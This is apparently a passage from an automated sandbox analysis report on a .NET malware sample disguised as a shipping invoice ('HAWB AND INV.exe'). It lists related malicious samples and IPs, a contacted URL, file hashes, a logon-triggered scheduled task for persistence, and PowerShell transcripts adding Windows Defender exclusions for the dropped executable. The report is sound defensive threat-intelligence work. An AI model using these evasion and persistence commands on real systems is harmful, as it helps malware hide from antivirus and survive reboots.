Match | Associated Sample Name / URL | Detection | Context
202.254.234.152 | 21AZZWCT.exe | malicious | www.pantan-kobo.com/ol/?id=9T9Ti/oEbGV5XKb/DiI7+YlY2YrLu7Qh2NTby3V925jAJz0JnotPS3vF81WrTrt3b5ypKJfWDP5iksTuKzm8UQ==&tv=u4NhtX-XqfSpdX

                                                                    Domains

                                                                    No context

                                                                    ASN

Match | Associated Sample Name / URL | Detection | Context
AS-26496-GO-DADDY-COM-LLCUS | Inquiry 05042021.doc | malicious | 107.180.43.16
 | don.exe | malicious | 184.168.131.241
 | Comand#U0103 de achizi#U021bie PP050321.exe | malicious | 184.168.131.241
 | O1E623TjjW.exe | malicious | 184.168.131.241
 | product specification.xlsx | malicious | 184.168.131.241
 | 9DWvynenEDJ11fY.exe | malicious | 184.168.131.241
 | PURCHASE ORDER.exe | malicious | 184.168.131.241
 | ETC-B72-LT-0149-03-AR.exe | malicious | 184.168.131.241
 | SecuriteInfo.com.Heur.3869.xls | malicious | 192.186.217.35
 | SecuriteInfo.com.Heur.3869.xls | malicious | 192.186.217.35
 | SecuriteInfo.com.Heur.12433.xls | malicious | 192.186.217.35
 | SecuriteInfo.com.Heur.12433.xls | malicious | 192.186.217.35
 | Documents_1906038956_974385067.xls | malicious | 192.186.217.35
 | Documents_1906038956_974385067.xls | malicious | 192.186.217.35
 | Bill Of Lading & Packing List.pdf.gz.exe | malicious | 107.180.44.132
 | SecuriteInfo.com.Heur.3421.xls | malicious | 192.186.217.35
 | SecuriteInfo.com.Heur.3421.xls | malicious | 192.186.217.35
 | Xerox Scan_07122020181109.exe | malicious | 50.62.160.30
 | 94a5cd81_by_Libranalysis.xls | malicious | 192.186.217.35
 | Documents_585904356_2104184844.xls | malicious | 192.186.217.35
ASDETUKhttpwwwheficedcomGB | b8768PLUW1.exe | malicious | 45.150.67.141
 | z3hir.x86 | malicious | 45.10.156.162
 | BVN1eAAgfj.exe | malicious | 45.150.67.203
 | Document_1097567093_03242021_Copy.xlsm | malicious | 45.150.67.23
 | Document_1097567093_03242021_Copy.xlsm | malicious | 45.150.67.23
 | efaxCanberraearlylearning_633.htm | malicious | 191.101.50.240
 | 7728839942-04012021.xlsm | malicious | 45.150.67.244
 | 7728839942-04012021.xlsm | malicious | 45.150.67.244
 | 7728839942-04012021.xlsm | malicious | 45.150.67.244
 | 9642351931-04012021.xlsm | malicious | 45.150.67.243
 | 91844756223-04012021.xlsm | malicious | 45.150.67.243
 | 9497306271-04012021.xlsm | malicious | 45.150.67.243
 | 7122681326-04012021.xlsm | malicious | 45.150.67.244
 | 9497306271-04012021.xlsm | malicious | 45.150.67.243
 | 9497306271-04012021.xlsm | malicious | 45.150.67.243
 | 91237434194-04012021.xlsm | malicious | 45.150.67.243
 | 71559035622-04012021.xlsm | malicious | 45.150.67.244
 | 91237434194-04012021.xlsm | malicious | 45.150.67.243
 | 91237434194-04012021.xlsm | malicious | 45.150.67.243
 | 91408811036-04012021.xlsm | malicious | 45.150.67.243

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HAWB AND INV.exe.log
                                                                    Process:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):1406
                                                                    Entropy (8bit):5.341099307467139
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                                                    MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                                                    SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                                                                    SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                                                                    SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):14734
                                                                    Entropy (8bit):4.993014478972177
                                                                    Encrypted:false
                                                                    SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                    MD5:8D5E194411E038C060288366D6766D3D
                                                                    SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                    SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                    SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                    Malicious:false
                                                                    Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 22300
Entropy (8bit): 5.601959909768602
Encrypted: false
SSDEEP: 384:+tCDX0FD4MBB30CCancSBKn+ultIo867Y9gpSJUeRq1BMrmihZOAV7WTQyb64I+i:3MBB3tc4K+ultp8+pXepthTS/g
MD5: 241BCBB5F7AD903FBBCC8E06DD3DBEA8
SHA1: 96CF72B66B02F0D23AAADC975EA8433CA6B12497
SHA-256: CAF362C288605DAB596260E52669FDC3515FEF5913EEB1ABF18AAB976098B2FA
SHA-512: 4557A6D914573A8EB8172289153D159FCB3856674E93ACC1DA0A9968175CCBC94ACC40B678A595FB639F6F4F28EBD19395DEBD4EC2DBADB94365B5C063A56E52
Malicious: false
Preview: @...e.................................<.4............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_452t2rgn.y0w.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ci5ca1ps.eac.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kktv134m.r1n.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4og0hre.avf.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qa3iixpe.2p0.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whb0pjwq.qxr.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\tmp9D41.tmp
Process: C:\Users\user\Desktop\HAWB AND INV.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1656
Entropy (8bit): 5.16428555186853
Encrypted: false
SSDEEP: 24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3Jtn:cbha7JlNQV/rydbz9I3YODOLNdq31
MD5: 04A6B80210066CDF78CC777D7077AC7B
SHA1: DC1B95866C360381A716ED386EA0FF326052D00E
SHA-256: EA7625AEF7C946221703A7714B8353E6AF13EA601AFDCC9DCA2410DF46AF1B12
SHA-512: E4B574E3E660E59CCC510644669909A1C2FF0C3B1EA32BB3F7580144A3240D80AE2E8D587CDA9ADA7B25B5364B7B5E9601479660211094C732F744899A6E1B44
Malicious: true
Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail
C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe
Process: C:\Users\user\Desktop\HAWB AND INV.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 741376
Entropy (8bit): 7.926075846118889
Encrypted: false
SSDEEP: 12288:vFAPrYNczrMFJxdNkJ41cx7acIXBFwbk2ldYaZPCwdwfPyfK8vW6M+:vFAjYysyCcGTqnCfPwK8vnt
MD5: 42662765A94CE5ECE11529509F937711
SHA1: DA57DD4C137C47FC9B906CAAF067C6ED13FA2DA6
SHA-256: 2138325DD5E2825EE4086187A944AF336476B0327E1DDAE7563BB24523836E08
SHA-512: 101D7BB5F778E779133F005C801FA26CF1BC147FED9F2774808526C50B3AE8E12863BC7EE3DFB060153D4B0B3A5EF66F357E44D477E1558060FE54DF990B4B95
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 21%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..<..........~[... ...`....@.. ....................................@.................................,[..O....`............................................................................... ............... ..H............text....;... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............N..............@..B................`[......H...........P...........\....<...........................................0............(!...(".........(.....o#....*.....................($......(%......(&......('......((....*N..(....o`...()....*&..(*....*.s+........s,........s-........s.........s/........*....0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*.0..<........~.....(5.....,!r...p.....(6...o7...s8............~.....+..*.0......
C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe:Zone.Identifier
Process: C:\Users\user\Desktop\HAWB AND INV.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: false
Preview: [ZoneTransfer]....ZoneId=0
C:\Users\user\Documents\20210503\PowerShell_transcript.760639.DjF4q4v1.20210503145231.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 5823
Entropy (8bit): 5.383418810910059
Encrypted: false
SSDEEP: 96:BZmTL7NmqDo1ZFZVTL7NmqDo1Z268ijZ5TL7NmqDo1ZlTyyOZp:I
MD5: 93129E478DEEEC2478437A8363A38EA4
SHA1: A1D28FA135CCBA1843AAF0CD815C7F13D23D11CE
SHA-256: F2DC8F1B35EDB24FAC6D6FF9FA7098630095C73D6AF50E266403E5F7067259B4
SHA-512: 69FB157B4DF97B16645CE833E992122FEF2B1F6881BB090DB904236279E6614B85C39D8962424EB9C33EF2D3FBF242322AA997B7762824BCB5DB82EF99B46BF4
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145256..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..Process ID: 4592..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145257..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..**********************..Windows PowerShell transcript start..Start time: 20210503145745..Username: computer\user..RunAs User: DES
C:\Users\user\Documents\20210503\PowerShell_transcript.760639.TlWWST52.20210503145228.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 5823
Entropy (8bit): 5.376422136318294
Encrypted: false
SSDEEP: 96:BZxTL7NJqDo1ZYZBTL7NJqDo1Zz68ijZNTL7NJqDo1ZFTyylZe:S
MD5: 5494E173E7978530BD8CE47B4FFD2F6F
SHA1: 98537F033C26E27190C1140D5F81C30D4B9BA46F
SHA-256: 583B8CDC55F3E5604E9455BC869C28E0A27C53D1269DB84AFC380E033E0F0F23
SHA-512: 54F090846A3633B2DAA570A0619DDA278C3CF77518123EC11AB558903A07BE3119D862E994FE3161DEC45B62FBE6E7EEB19875BE48FF43BB4E60ADA21C9C7B0A
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145253..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..Process ID: 7020..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145254..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe..**********************..Windows PowerShell transcript start..Start time: 20210503150325..Username: computer\user..RunAs User: DES
C:\Users\user\Documents\20210503\PowerShell_transcript.760639.loHpl5Ui.20210503145226.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 3488
Entropy (8bit): 5.3223569299956495
Encrypted: false
SSDEEP: 96:BZNTL7NAqDo1ZG2ZRTL7NAqDo1ZGqaf0cf0cf03Zw:6rrR
MD5: 223BAC110AB9E04C3C2F1CE42C060EB9
SHA1: 0B87633A2276344A3CBE4542D80CDA52E0C40656
SHA-256: DDA355E36125BD1DFEE7FE3280BE85A0DBA31EB7048D1637856DF32BF9907223
SHA-512: 688672FDB2F5F64CEF935D12795C633CA3B93EF800AD8ED2E4529A5C8600FC7A239AEF085B9DB8E3743FB49FEC59DC92CCC29AAF51E1C734C9646176DC7E86F1
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20210503145248..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HAWB AND INV.exe..Process ID: 6932..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210503145249..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HAWB AND INV.exe..**********************..Command start time: 20210503145543..**********************..PS>TerminatingError(Add-MpPreference): "A positional parameter cannot

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.926075846118889
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: HAWB AND INV.exe
File size: 741376
MD5: 42662765a94ce5ece11529509f937711
SHA1: da57dd4c137c47fc9b906caaf067c6ed13fa2da6
SHA256: 2138325dd5e2825ee4086187a944af336476b0327e1ddae7563bb24523836e08
SHA512: 101d7bb5f778e779133f005c801fa26cf1bc147fed9f2774808526c50b3ae8e12863bc7ee3dfb060153d4b0b3a5ef66f357e44d477e1558060fe54df990b4b95
SSDEEP: 12288:vFAPrYNczrMFJxdNkJ41cx7acIXBFwbk2ldYaZPCwdwfPyfK8vW6M+:vFAjYysyCcGTqnCfPwK8vnt
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..<..........~[... ...`....@.. ....................................@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x4b5b7e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x608FAFA4 [Mon May 3 08:09:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5b2c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb6000 | 0xeb8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb3b84 | 0xb3c00 | False | 0.938279620132 | data | 7.93407065965 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xb6000 | 0xeb8 | 0x1000 | False | 0.375732421875 | data | 4.76936310613 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb8000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

